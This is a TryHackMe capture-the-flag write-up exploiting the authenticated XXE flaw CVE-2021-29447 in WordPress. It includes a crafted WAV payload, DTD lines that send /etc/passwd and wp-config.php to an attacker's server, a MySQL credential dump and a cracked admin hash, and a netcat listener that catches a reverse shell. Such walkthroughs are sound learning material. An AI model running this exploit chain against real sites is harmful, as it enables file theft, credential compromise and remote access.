WordPress (TryHackMe) — Uploaded a crafted WAV to exploit CVE-2021-29447 (authenticated XXE), read wp-config.php to obtain DB credentials, cracked admin hash, and gained a reverse shell.

Recon#

Scan the ports and services.

1
$ nmap -sC -sV 10.201.103.202
2
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 04:13 +06
3
Nmap scan report for 10.201.103.202
4
Host is up (0.34s latency).
5
Not shown: 997 closed tcp ports (reset)
6
PORT     STATE SERVICE VERSION
7
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
8
| ssh-hostkey:
9
|   2048 f0:65:b8:42:b7:c3:ba:8e:fe:e4:3c:cd:57:f1:29:2e (RSA)
10
|   256 42:1e:1b:8f:19:38:99:2e:36:70:cf:0e:b6:31:92:14 (ECDSA)
11
|_  256 8e:89:43:de:5d:9b:99:66:c4:2a:93:17:f3:0e:e1:f4 (ED25519)
12
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
13
|_http-generator: WordPress 5.6.2
14
|_http-title: Tryhackme &#8211; Just another WordPress site
15
|_http-server-header: Apache/2.4.18 (Ubuntu)
16
3306/tcp open  mysql   MySQL 5.7.33-0ubuntu0.16.04.1
17
| mysql-info:
18
|   Protocol: 10
19
|   Version: 5.7.33-0ubuntu0.16.04.1
20
|   Thread ID: 151
21
|   Capabilities flags: 65535
22
|   Some Capabilities: LongColumnFlag, IgnoreSpaceBeforeParenthesis, SupportsCompression, Speaks41ProtocolOld, InteractiveClient, Speaks41ProtocolNew, LongPassword, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, IgnoreSigpipes, SwitchToSSLAfterHandshake, Support41Auth, ODBCClient, SupportsTransactions, FoundRows, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
23
|   Status: Autocommit
24
|   Salt: 40Y\x0EwfEbM\x17<X&':72p,H
25
|_  Auth Plugin Name: mysql_native_password
26
| ssl-cert: Subject: commonName=MySQL_Server_5.7.33_Auto_Generated_Server_Certificate
27
| Not valid before: 2021-05-26T21:23:31
28
|_Not valid after:  2031-05-24T21:23:31
29
|_ssl-date: TLS randomness does not represent time
30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
31

32
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
33
Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds

Exploiting CVE-2021-29447#

CVE-2021-29447 is an authenticated XML External Entity (XXE) vulnerability in WordPress’s Media Library that affects PHP 8. To demonstrate the vulnerability, I followed the published guidance to create a malicious WAV payload and uploaded it via the WordPress dashboard’s Media Library.

Steps to reproduce (test environment):

Log in to the WordPress admin panel using the following credentials:
- Username: test-corp
- Password: test
After logging in, navigate to Media → Add New.

Upload the crafted WAV file (the malicious payload) through the Add New interface to trigger the XXE behaviour.

Create payload#

This can be created as follows:

1
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '''''http://IP:4444/shell.dtd'''''>%remote;%init;%trick;]>\x00' > payload.wav

1
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
2
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://IP:4444/?p=%file;'>" >

1
php -S 0.0.0.0:4444

Once uploaded, I was able to use this file to establish a connection back to my HTTP server and execute an XXE attack by including /etc/passwd without proper validation, thereby accessing sensitive data on the targeted system. For this purpose, I also created a custom file called NAMEEVIL.dtd, which connected to the server and provided content in encoded base64 form.

By decoding the /etc/passwd file, I was able to successfully exploit the vulnerability.

1
   root:x:0:0:root:/root:/bin/bash
2
   daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
3
   bin:x:2:2:bin:/bin:/usr/sbin/nologin
4
   sys:x:3:3:sys:/dev:/usr/sbin/nologin
5
   sync:x:4:65534:sync:/bin:/bin/sync
6
   games:x:5:60:games:/usr/games:/usr/sbin/nologin
7
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
8
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
9
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
10
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
11
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
12
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
13
   www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
14
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
15
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
16
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
17
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
18
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
19
   systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
20
   systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
21
   systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
22
   systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
23
   syslog:x:104:108::/home/syslog:/bin/false
24
   _apt:x:105:65534::/nonexistent:/bin/false
25
   messagebus:x:106:110::/var/run/dbus:/bin/false
26
   uuidd:x:107:111::/run/uuidd:/bin/false
27
   czjqqkd:6REDACTEDczjqqkd:7:x:1000:1000:CVE-2021-29447,,,:/home/czjqqkd:8REDACTEDczjqqkd:9:/bin/bash
28
   sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
29
   mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false

Exploiting Wordpress#

The next step is to enumerate the WordPress website on port 80 and obtain its wp-config.php. This file meets the requirement of the first objective in the current room.

Use the vulnerability CVE-2021-29447 to read the wordpress configuration file.

By gaining access to the wp-config.php file, I can obtain sensitive data, such as database credentials, that can be used to further penetrate the system. I used same technique as follows by replacing the dtd file with

1
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
2
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://10.17.44.22:4444/?p=%file;'>" >

Here is the decoded Base64 file

1
 <?php
2
/**
3
 * The base configuration for WordPress
4
 *
5
 * The wp-config.php creation script uses this file during the
6
 * installation. You don't have to use the web site, you can
7
 * copy this file to "wp-config.php" and fill in the values.
8
 *
9
 * This file contains the following configurations:
10
 *
11
 * * MySQL settings
12
 * * Secret keys
13
 * * Database table prefix
14
 * * ABSPATH
15
 *
16
 * @link https://wordpress.org/support/article/editing-wp-config-php/
17
 *
18
 * @package WordPress
19
 */
20

21
// ** MySQL settings - You can get this info from your web host ** //
22
/** The name of the database for WordPress */
23
define( 'DB_NAME', 'REDACTED' );
24

25
/** MySQL database username */
26
define( 'DB_USER', 'REDACTED' );
27

28
/** MySQL database password */
29
define( 'DB_PASSWORD', 'REDACTED' );
30

31
/** MySQL hostname */
32
define( 'DB_HOST', 'localhost' );
33

34
/** Database Charset to use in creating database tables. */
35
define( 'DB_CHARSET', 'utf8' );
36

37
/** The Database Collate type. Don't change this if in doubt. */
38
define( 'DB_COLLATE', '' );

Gaining ADMIN account#

After obtaining the database credentials, I attempted to log in to MySQL, as our scanning process revealed that it was open on port 3306. Upon logging in, I discovered the presence of a ~~REDACTED~~ database that contained usernames and databases.

1
mysql -h 10.201.103.202 -u thedarktangent -p --ssl=0

1
MySQL [(none)]> show databases;
2
+--------------------+
3
| Database           |
4
+--------------------+
5
| information_schema |
6
| mysql              |
7
| performance_schema |
8
| sys                |
9
| wordpressdb2       |
10
+--------------------+
11
5 rows in set (0.338 sec)
12

13
MySQL [(none)]> use wordpressdb2;
14
Reading table information for completion of table and column names
15
You can turn off this feature to get a quicker startup with -A
16

17
Database changed
18
MySQL [wordpressdb2]> show tables;
19
+--------------------------+
20
| Tables_in_wordpressdb2   |
21
+--------------------------+
22
| wptry_commentmeta        |
23
| wptry_comments           |
24
| wptry_links              |
25
| wptry_options            |
26
| wptry_postmeta           |
27
| wptry_posts              |
28
| wptry_term_relationships |
29
| wptry_term_taxonomy      |
30
| wptry_termmeta           |
31
| wptry_terms              |
32
| wptry_usermeta           |
33
| wptry_users              |
34
+--------------------------+
35
12 rows in set (0.335 sec)
36

37
MySQL [wordpressdb2]> select * from wptry_users;
38
+----+------------+------------------------------------+---------------+------------------------------+----------------------------------+---------------------+-----------------------------------------------+-------------+------------------+
39
| ID | user_login | user_pass                          | user_nicename | user_email                   | user_url                         | user_registered     | user_activation_key                           | user_status | display_name     |
40
+----+------------+------------------------------------+---------------+------------------------------+----------------------------------+---------------------+-----------------------------------------------+-------------+------------------+
41
|  1 | corp-001   | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 | corp-001      | corp-001@fakemail.com        | http://192.168.85.131/wordpress2 | 2021-05-26 23:35:28 |                                               |           0 | corp-001         |
42
|  2 | test-corp  | $P$Bk3Zzr8rb.5dimh99TRE1krX8X85eR0 | test-corp     | test-corp@tryhackme.fakemail |                                  | 2021-05-26 23:47:32 | 1622072852:$P$BJWv.2ehT6U5Ndg/xmFlLobPl37Xno0 |           0 | Corporation Test |
43
+----+------------+------------------------------------+---------------+------------------------------+----------------------------------+---------------------+-----------------------------------------------+-------------+------------------+
44
2 rows in set (0.336 sec)
45

46
MySQL [wordpressdb2]>

I quickly accessed ~~REDACTED~~ table and retrieved the administrator’s username and password. This was crucial, as the current user did not have full access to other WordPress features. With the admin’s credentials, I can now carry out more advanced attacks to gain shell.

1
corp-001   | $P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1 | corp-001      | corp-001@fakemail.com

I investigated further to know about its hash-type and learnt that is was ‘phpass’, and I cracked it through john.

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

1
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
2
Using default input encoding: UTF-8
3
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 SSE2 4x3])
4
Cost 1 (iteration count) is 8192 for all loaded hashes
5
Will run 2 OpenMP threads
6
Press 'q' or Ctrl-C to abort, almost any other key for status
7
teddybear        (?)
8
1g 0:00:00:00 DONE (2025-09-16 04:37) 5.000g/s 2400p/s 2400c/s 2400C/s jeffrey..marie
9
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
10
Session completed.

username: corp-001

password: teddybear

Initial Foothold#

In order to gain shell, I changed the WordPress account to the corp-001 admin account and began exploring the plugin feature. Initially, I attempted to perform an Arbitrary File Upload by downloading a vulnerable Gallery Plugin, but unfortunately, my attempts were failed.

then, I proceeded to deactivate that plugin and attempted to edit one of the php files with my custom PHP reverse shell code. By doing so, I aimed to establish a reverse shell on the system, granting me remote access and control.

1
┌──(shohan㉿kali)-[~/Tryhackmy_rooms/Wordpress:CVE-2021-29447]
2
└─$ rlwrap nc -lvnp 4444
3
listening on [any] 4444 ...
4
connect to [10.17.44.22] from (UNKNOWN) [10.201.61.87] 42472
5
Linux ubuntu 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
6
 16:07:05 up 6 min,  0 users,  load average: 0.00, 0.00, 0.00
7
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
9
/bin/sh: 0: can't access tty; job control turned off
10
$ whoami
11
www-data
12
$ cd /home
13
$ ls
14
stux
15
$ cd stux
16
$ ls
17
flag
18
$ ls -la
19
total 44
20
drwxr-xr-x 5 stux stux 4096 May 26  2021 .
21
drwxr-xr-x 3 root root 4096 May 26  2021 ..
22
-rw------- 1 root root 3359 May 26  2021 .bash_history
23
-rw-r--r-- 1 stux stux  220 May 26  2021 .bash_logout
24
-rw-r--r-- 1 stux stux 3771 May 26  2021 .bashrc
25
drwx------ 2 stux stux 4096 May 26  2021 .cache
26
-rw------- 1 stux stux  131 May 26  2021 .mysql_history
27
drwxrwxr-x 2 stux stux 4096 May 26  2021 .nano
28
-rw-r--r-- 1 stux stux  655 May 26  2021 .profile
29
-rw-r--r-- 1 stux stux    0 May 26  2021 .sudo_as_admin_successful
30
-rw-r--r-- 1 root root  183 May 26  2021 .wget-hsts
31
drwxrwxr-x 2 stux stux 4096 May 26  2021 flag
32
$ cd flag
33
$ ls
34
flag.txt
35
$ cat flag.txt
36
thm{REDACTED}
37
$